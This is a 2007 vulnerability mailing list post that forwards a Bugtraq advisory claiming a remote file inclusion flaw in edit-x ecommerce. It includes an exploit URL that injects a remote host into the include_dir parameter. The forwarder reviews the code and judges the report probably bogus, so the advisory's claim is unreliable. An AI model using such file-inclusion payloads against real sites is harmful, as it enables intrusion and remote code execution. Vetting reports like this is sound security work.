[VIM] Fwd: edit-x ecommerce (include_dir) Remote File include

str0ke str0ke at milw0rm.com
Tue Jan 9 21:31:10 EST 2007


---------- Forwarded message ----------
From: emel_gw_ini at yahoo.com <emel_gw_ini at yahoo.com>
Date: 9 Jan 2007 21:36:33 -0000
Subject: edit-x ecommerce (include_dir) Remote File include
To: bugtraq at securityfocus.com


============================ HItamputih Crew ====================
# hitamputih Advisory
# Discovered By : IbnuSina
#-----------------------------------------------------------
# Software: edit x
# Vendor : http://www.edit-x.com
# Method: file inclusion
# Thanks To : akukasih,nyubi,irvian,BlueSpy,IFX,arioo and all #hitamputih crew

[[inject]]]---------------------------------------------------------

on file editx/edit_address.php

$_SESSION = array();
include($include_dir.'/'.'session.'.PHP);
include($include_dir.'/'.'function.'.PHP);
require_once("../ups/upsavs.php");

exploit :

http://target.lu/[editx
PATH]/editx/edit_address.php?include_dir=HTTP://injekan.lu?

[[End]]-----------------------------------------------------------

This is pretty much what the file looks like

ob_start();

$db_edx_host = 					"localhost";				// Database Hostname
$db_edx_user = 					"";		    			// Database Username
$db_edx_pass = 					"";					// Database Password
$db_edx_name = 					"";					// Database Name
$high_traffic = 				"N";						// Persistant Connections
$edx_index = 					"index";					// Default PHP File
$php = 							"php";						// PHP File Extention
$cda_dir = 						"cda";						// CDA Include Folder
$include_dir = 					"include";					// CMA Include Folder
$directory = 					"";							// Install Folder
$smarty_dir = 					"smarty";					// Smarty Folder
$template_dir = 				"template";					// Template Folder
$caching = 						"N";						// Caching
$debug_flag = 					"Y";						// Debug Flag
$debug_file = 					"debug.txt";				// Debug File
$edx_key = 						"editx_key";				// Decrypt Key
include('../cda/constants.'.$php); << doesn't seem to have anything
that makes this vulnerable.

$_SESSION = array();
include($include_dir.'/'.'session.'.PHP);
include($include_dir.'/'.'function.'.PHP);


Seems to be another bogus.

/str0ke


More information about the VIM mailing list